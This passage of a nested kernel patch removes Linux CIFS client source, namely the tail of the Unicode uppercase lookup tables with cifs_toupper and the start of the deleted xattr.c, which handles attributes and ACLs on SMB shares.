+-	0x24ce, 0x24cf, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-};
+-
+-static const wchar_t t2_2c[256] = {
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x2c00, 0x2c01, 0x2c02, 0x2c03, 0x2c04, 0x2c05, 0x2c06, 0x2c07,
+-	0x2c08, 0x2c09, 0x2c0a, 0x2c0b, 0x2c0c, 0x2c0d, 0x2c0e, 0x2c0f,
+-	0x2c10, 0x2c11, 0x2c12, 0x2c13, 0x2c14, 0x2c15, 0x2c16, 0x2c17,
+-	0x2c18, 0x2c19, 0x2c1a, 0x2c1b, 0x2c1c, 0x2c1d, 0x2c1e, 0x2c1f,
+-	0x2c20, 0x2c21, 0x2c22, 0x2c23, 0x2c24, 0x2c25, 0x2c26, 0x2c27,
+-	0x2c28, 0x2c29, 0x2c2a, 0x2c2b, 0x2c2c, 0x2c2d, 0x2c2e, 0x0000,
+-	0x0000, 0x2c60, 0x0000, 0x0000, 0x0000, 0x023a, 0x023e, 0x0000,
+-	0x2c67, 0x0000, 0x2c69, 0x0000, 0x2c6b, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x2c72, 0x0000, 0x0000, 0x2c75, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x2c80, 0x0000, 0x2c82, 0x0000, 0x2c84, 0x0000, 0x2c86,
+-	0x0000, 0x2c88, 0x0000, 0x2c8a, 0x0000, 0x2c8c, 0x0000, 0x2c8e,
+-	0x0000, 0x2c90, 0x0000, 0x2c92, 0x0000, 0x2c94, 0x0000, 0x2c96,
+-	0x0000, 0x2c98, 0x0000, 0x2c9a, 0x0000, 0x2c9c, 0x0000, 0x2c9e,
+-	0x0000, 0x2ca0, 0x0000, 0x2ca2, 0x0000, 0x2ca4, 0x0000, 0x2ca6,
+-	0x0000, 0x2ca8, 0x0000, 0x2caa, 0x0000, 0x2cac, 0x0000, 0x2cae,
+-	0x0000, 0x2cb0, 0x0000, 0x2cb2, 0x0000, 0x2cb4, 0x0000, 0x2cb6,
+-	0x0000, 0x2cb8, 0x0000, 0x2cba, 0x0000, 0x2cbc, 0x0000, 0x2cbe,
+-	0x0000, 0x2cc0, 0x0000, 0x2cc2, 0x0000, 0x2cc4, 0x0000, 0x2cc6,
+-	0x0000, 0x2cc8, 0x0000, 0x2cca, 0x0000, 0x2ccc, 0x0000, 0x2cce,
+-	0x0000, 0x2cd0, 0x0000, 0x2cd2, 0x0000, 0x2cd4, 0x0000, 0x2cd6,
+-	0x0000, 0x2cd8, 0x0000, 0x2cda, 0x0000, 0x2cdc, 0x0000, 0x2cde,
+-	0x0000, 0x2ce0, 0x0000, 0x2ce2, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-};
+-
+-static const wchar_t t2_2d[256] = {
+-	0x10a0, 0x10a1, 0x10a2, 0x10a3, 0x10a4, 0x10a5, 0x10a6, 0x10a7,
+-	0x10a8, 0x10a9, 0x10aa, 0x10ab, 0x10ac, 0x10ad, 0x10ae, 0x10af,
+-	0x10b0, 0x10b1, 0x10b2, 0x10b3, 0x10b4, 0x10b5, 0x10b6, 0x10b7,
+-	0x10b8, 0x10b9, 0x10ba, 0x10bb, 0x10bc, 0x10bd, 0x10be, 0x10bf,
+-	0x10c0, 0x10c1, 0x10c2, 0x10c3, 0x10c4, 0x10c5, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-};
+-
+-static const wchar_t t2_a6[256] = {
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0xa640, 0x0000, 0xa642, 0x0000, 0xa644, 0x0000, 0xa646,
+-	0x0000, 0xa648, 0x0000, 0xa64a, 0x0000, 0xa64c, 0x0000, 0xa64e,
+-	0x0000, 0xa650, 0x0000, 0xa652, 0x0000, 0xa654, 0x0000, 0xa656,
+-	0x0000, 0xa658, 0x0000, 0xa65a, 0x0000, 0xa65c, 0x0000, 0xa65e,
+-	0x0000, 0x0000, 0x0000, 0xa662, 0x0000, 0xa664, 0x0000, 0xa666,
+-	0x0000, 0xa668, 0x0000, 0xa66a, 0x0000, 0xa66c, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0xa680, 0x0000, 0xa682, 0x0000, 0xa684, 0x0000, 0xa686,
+-	0x0000, 0xa688, 0x0000, 0xa68a, 0x0000, 0xa68c, 0x0000, 0xa68e,
+-	0x0000, 0xa690, 0x0000, 0xa692, 0x0000, 0xa694, 0x0000, 0xa696,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-};
+-
+-static const wchar_t t2_a7[256] = {
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0xa722, 0x0000, 0xa724, 0x0000, 0xa726,
+-	0x0000, 0xa728, 0x0000, 0xa72a, 0x0000, 0xa72c, 0x0000, 0xa72e,
+-	0x0000, 0x0000, 0x0000, 0xa732, 0x0000, 0xa734, 0x0000, 0xa736,
+-	0x0000, 0xa738, 0x0000, 0xa73a, 0x0000, 0xa73c, 0x0000, 0xa73e,
+-	0x0000, 0xa740, 0x0000, 0xa742, 0x0000, 0xa744, 0x0000, 0xa746,
+-	0x0000, 0xa748, 0x0000, 0xa74a, 0x0000, 0xa74c, 0x0000, 0xa74e,
+-	0x0000, 0xa750, 0x0000, 0xa752, 0x0000, 0xa754, 0x0000, 0xa756,
+-	0x0000, 0xa758, 0x0000, 0xa75a, 0x0000, 0xa75c, 0x0000, 0xa75e,
+-	0x0000, 0xa760, 0x0000, 0xa762, 0x0000, 0xa764, 0x0000, 0xa766,
+-	0x0000, 0xa768, 0x0000, 0xa76a, 0x0000, 0xa76c, 0x0000, 0xa76e,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0xa779, 0x0000, 0xa77b, 0x0000, 0x0000, 0xa77e,
+-	0x0000, 0xa780, 0x0000, 0xa782, 0x0000, 0xa784, 0x0000, 0xa786,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0xa78b, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-};
+-
+-static const wchar_t t2_ff[256] = {
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0xff21, 0xff22, 0xff23, 0xff24, 0xff25, 0xff26, 0xff27,
+-	0xff28, 0xff29, 0xff2a, 0xff2b, 0xff2c, 0xff2d, 0xff2e, 0xff2f,
+-	0xff30, 0xff31, 0xff32, 0xff33, 0xff34, 0xff35, 0xff36, 0xff37,
+-	0xff38, 0xff39, 0xff3a, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-};
+-
+-static const wchar_t *const toplevel[256] = {
+-	t2_00, t2_01, t2_02, t2_03, t2_04, t2_05,  NULL,  NULL,
+-	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
+-	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
+-	NULL,  NULL,  NULL,  NULL,  NULL, t2_1d, t2_1e, t2_1f,
+-	NULL, t2_21,  NULL,  NULL, t2_24,  NULL,  NULL,  NULL,
+-	NULL,  NULL,  NULL,  NULL, t2_2c, t2_2d,  NULL,  NULL,
+-	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
+-	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
+-	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
+-	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
+-	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
+-	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
+-	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
+-	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
+-	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
+-	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
+-	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
+-	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
+-	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
+-	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
+-	NULL,  NULL,  NULL,  NULL,  NULL,  NULL, t2_a6, t2_a7,
+-	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
+-	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
+-	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
+-	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
+-	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
+-	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
+-	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
+-	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
+-	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
+-	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
+-	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL, t2_ff,
+-};
+-
+-/**
+- * cifs_toupper - convert a wchar_t from lower to uppercase
+- * @in: character to convert from lower to uppercase
+- *
+- * This function consults the static tables above to convert a wchar_t from
+- * lower to uppercase. In the event that there is no mapping, the original
+- * "in" character is returned.
+- */
+-wchar_t
+-cifs_toupper(wchar_t in)
+-{
+-	unsigned char idx;
+-	const wchar_t *tbl;
+-	wchar_t out;
+-
+-	/* grab upper byte */
+-	idx = (in & 0xff00) >> 8;
+-
+-	/* find pointer to 2nd layer table */
+-	tbl = toplevel[idx];
+-	if (!tbl)
+-		return in;
+-
+-	/* grab lower byte */
+-	idx = in & 0xff;
+-
+-	/* look up character in table */
+-	out = tbl[idx];
+-	if (out)
+-		return out;
+-
+-	return in;
+-}
+diff --git a/fs/cifs/xattr.c b/fs/cifs/xattr.c
+deleted file mode 100644
+index 998fa51f9b684..0000000000000
+--- a/fs/cifs/xattr.c
++++ /dev/null
+@@ -1,555 +0,0 @@
+-// SPDX-License-Identifier: LGPL-2.1
+-/*
+- *
+- *   Copyright (c) International Business Machines  Corp., 2003, 2007
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *
+- */
+-
+-#include <linux/fs.h>
+-#include <linux/posix_acl_xattr.h>
+-#include <linux/slab.h>
+-#include <linux/xattr.h>
+-#include "cifsfs.h"
+-#include "cifspdu.h"
+-#include "cifsglob.h"
+-#include "cifsproto.h"
+-#include "cifs_debug.h"
+-#include "cifs_fs_sb.h"
+-#include "cifs_unicode.h"
+-#include "cifs_ioctl.h"
+-
+-#define MAX_EA_VALUE_SIZE CIFSMaxBufSize
+-#define CIFS_XATTR_CIFS_ACL "system.cifs_acl" /* DACL only */
+-#define CIFS_XATTR_CIFS_NTSD "system.cifs_ntsd" /* owner plus DACL */
+-#define CIFS_XATTR_CIFS_NTSD_FULL "system.cifs_ntsd_full" /* owner/DACL/SACL */
+-#define CIFS_XATTR_ATTRIB "cifs.dosattrib"  /* full name: user.cifs.dosattrib */
+-#define CIFS_XATTR_CREATETIME "cifs.creationtime"  /* user.cifs.creationtime */
+-/*
+- * Although these are just aliases for the above, we need to move away from
+- * confusing users by using the 20+ year old term 'cifs', which is no longer
+- * secure, having been replaced by SMB2 (and the even more secure SMB3) years ago
+- */
+-#define SMB3_XATTR_CIFS_ACL "system.smb3_acl" /* DACL only */
+-#define SMB3_XATTR_CIFS_NTSD "system.smb3_ntsd" /* owner plus DACL */
+-#define SMB3_XATTR_CIFS_NTSD_FULL "system.smb3_ntsd_full" /* owner/DACL/SACL */
+-#define SMB3_XATTR_ATTRIB "smb3.dosattrib"  /* full name: user.smb3.dosattrib */
+-#define SMB3_XATTR_CREATETIME "smb3.creationtime"  /* user.smb3.creationtime */
+-/* BB need to add server (e.g. Samba) support for security and trusted prefix */
+-
+-enum { XATTR_USER, XATTR_CIFS_ACL, XATTR_ACL_ACCESS, XATTR_ACL_DEFAULT,
+-	XATTR_CIFS_NTSD, XATTR_CIFS_NTSD_FULL };
+-
+-static int cifs_attrib_set(unsigned int xid, struct cifs_tcon *pTcon,
+-			   struct inode *inode, const char *full_path,
+-			   const void *value, size_t size)
+-{
+-	ssize_t rc = -EOPNOTSUPP;
+-	__u32 *pattrib = (__u32 *)value;
+-	__u32 attrib;
+-	FILE_BASIC_INFO info_buf;
+-
+-	if ((value == NULL) || (size != sizeof(__u32)))
+-		return -ERANGE;
+-
+-	memset(&info_buf, 0, sizeof(info_buf));
+-	attrib = *pattrib;
+-	info_buf.Attributes = cpu_to_le32(attrib);
+-	if (pTcon->ses->server->ops->set_file_info)
+-		rc = pTcon->ses->server->ops->set_file_info(inode, full_path,
+-				&info_buf, xid);
+-	if (rc == 0)
+-		CIFS_I(inode)->cifsAttrs = attrib;
+-
+-	return rc;
+-}
+-
+-static int cifs_creation_time_set(unsigned int xid, struct cifs_tcon *pTcon,
+-				  struct inode *inode, const char *full_path,
+-				  const void *value, size_t size)
+-{
+-	ssize_t rc = -EOPNOTSUPP;
+-	__u64 *pcreation_time = (__u64 *)value;
+-	__u64 creation_time;
+-	FILE_BASIC_INFO info_buf;
+-
+-	if ((value == NULL) || (size != sizeof(__u64)))
+-		return -ERANGE;
+-
+-	memset(&info_buf, 0, sizeof(info_buf));
+-	creation_time = *pcreation_time;
+-	info_buf.CreationTime = cpu_to_le64(creation_time);
+-	if (pTcon->ses->server->ops->set_file_info)
+-		rc = pTcon->ses->server->ops->set_file_info(inode, full_path,
+-				&info_buf, xid);
+-	if (rc == 0)
+-		CIFS_I(inode)->createtime = creation_time;
+-
+-	return rc;
+-}
+-
+-static int cifs_xattr_set(const struct xattr_handler *handler,
+-			  struct user_namespace *mnt_userns,
+-			  struct dentry *dentry, struct inode *inode,
+-			  const char *name, const void *value,
+-			  size_t size, int flags)
+-{
+-	int rc = -EOPNOTSUPP;
+-	unsigned int xid;
+-	struct super_block *sb = dentry->d_sb;
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
+-	struct tcon_link *tlink;
+-	struct cifs_tcon *pTcon;
+-	const char *full_path;
+-	void *page;
+-
+-	tlink = cifs_sb_tlink(cifs_sb);
+-	if (IS_ERR(tlink))
+-		return PTR_ERR(tlink);
+-	pTcon = tlink_tcon(tlink);
+-
+-	xid = get_xid();
+-	page = alloc_dentry_path();
+-
+-	full_path = build_path_from_dentry(dentry, page);
+-	if (IS_ERR(full_path)) {
+-		rc = PTR_ERR(full_path);
+-		goto out;
+-	}
+-	/* return dos attributes as pseudo xattr */
+-	/* return alt name if available as pseudo attr */
+-
+-	/* if proc/fs/cifs/streamstoxattr is set then
+-		search server for EAs or streams to
+-		return as xattrs */
+-	if (size > MAX_EA_VALUE_SIZE) {
+-		cifs_dbg(FYI, "size of EA value too large\n");
+-		rc = -EOPNOTSUPP;
+-		goto out;
+-	}
+-
+-	switch (handler->flags) {
+-	case XATTR_USER:
+-		cifs_dbg(FYI, "%s:setting user xattr %s\n", __func__, name);
+-		if ((strcmp(name, CIFS_XATTR_ATTRIB) == 0) ||
+-		    (strcmp(name, SMB3_XATTR_ATTRIB) == 0)) {
+-			rc = cifs_attrib_set(xid, pTcon, inode, full_path,
+-					value, size);
+-			if (rc == 0) /* force revalidate of the inode */
+-				CIFS_I(inode)->time = 0;
+-			break;
+-		} else if ((strcmp(name, CIFS_XATTR_CREATETIME) == 0) ||
+-			   (strcmp(name, SMB3_XATTR_CREATETIME) == 0)) {
+-			rc = cifs_creation_time_set(xid, pTcon, inode,
+-					full_path, value, size);
+-			if (rc == 0) /* force revalidate of the inode */
+-				CIFS_I(inode)->time = 0;
+-			break;
+-		}
+-
+-		if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_XATTR)
+-			goto out;
+-
+-		if (pTcon->ses->server->ops->set_EA)
+-			rc = pTcon->ses->server->ops->set_EA(xid, pTcon,
+-				full_path, name, value, (__u16)size,
+-				cifs_sb->local_nls, cifs_sb);
+-		break;
+-
+-	case XATTR_CIFS_ACL:
+-	case XATTR_CIFS_NTSD:
+-	case XATTR_CIFS_NTSD_FULL: {
+-		struct cifs_ntsd *pacl;
+-
+-		if (!value)
+-			goto out;
+-		pacl = kmalloc(size, GFP_KERNEL);
+-		if (!pacl) {
+-			rc = -ENOMEM;
+-		} else {
+-			memcpy(pacl, value, size);
+-			if (pTcon->ses->server->ops->set_acl) {
+-				int aclflags = 0;
+-				rc = 0;
+-
+-				switch (handler->flags) {
+-				case XATTR_CIFS_NTSD_FULL:
+-					aclflags = (CIFS_ACL_OWNER |
+-						    CIFS_ACL_GROUP |
+-						    CIFS_ACL_DACL |
+-						    CIFS_ACL_SACL);
+-					break;
+-				case XATTR_CIFS_NTSD:
+-					aclflags = (CIFS_ACL_OWNER |
+-						    CIFS_ACL_GROUP |
+-						    CIFS_ACL_DACL);
+-					break;
+-				case XATTR_CIFS_ACL:
+-				default:
+-					aclflags = CIFS_ACL_DACL;
+-				}
+-
+-				rc = pTcon->ses->server->ops->set_acl(pacl,
+-					size, inode, full_path, aclflags);
+-			} else {
+-				rc = -EOPNOTSUPP;
+-			}
+-			if (rc == 0) /* force revalidate of the inode */
+-				CIFS_I(inode)->time = 0;
+-			kfree(pacl);
+-		}
+-		break;
+-	}
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-	case XATTR_ACL_ACCESS:
+-#ifdef CONFIG_CIFS_POSIX
+-		if (!value)
+-			goto out;
+-		if (sb->s_flags & SB_POSIXACL)
+-			rc = CIFSSMBSetPosixACL(xid, pTcon, full_path,
+-				value, (const int)size,
+-				ACL_TYPE_ACCESS, cifs_sb->local_nls,
+-				cifs_remap(cifs_sb));
+-#endif  /* CONFIG_CIFS_POSIX */
+-		break;
+-
+-	case XATTR_ACL_DEFAULT:
+-#ifdef CONFIG_CIFS_POSIX
+-		if (!value)
+-			goto out;
+-		if (sb->s_flags & SB_POSIXACL)
+-			rc = CIFSSMBSetPosixACL(xid, pTcon, full_path,
+-				value, (const int)size,
+-				ACL_TYPE_DEFAULT, cifs_sb->local_nls,
+-				cifs_remap(cifs_sb));
+-#endif  /* CONFIG_CIFS_POSIX */
+-		break;
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-	}
+-
+-out:
+-	free_dentry_path(page);
+-	free_xid(xid);
+-	cifs_put_tlink(tlink);
+-	return rc;
+-}
+-
+-static int cifs_attrib_get(struct dentry *dentry,
+-			   struct inode *inode, void *value,
+-			   size_t size)
+-{
+-	ssize_t rc;
+-	__u32 *pattribute;
+-
+-	rc = cifs_revalidate_dentry_attr(dentry);
+-
+-	if (rc)
+-		return rc;
+-
+-	if ((value == NULL) || (size == 0))
+-		return sizeof(__u32);
+-	else if (size < sizeof(__u32))
+-		return -ERANGE;
+-
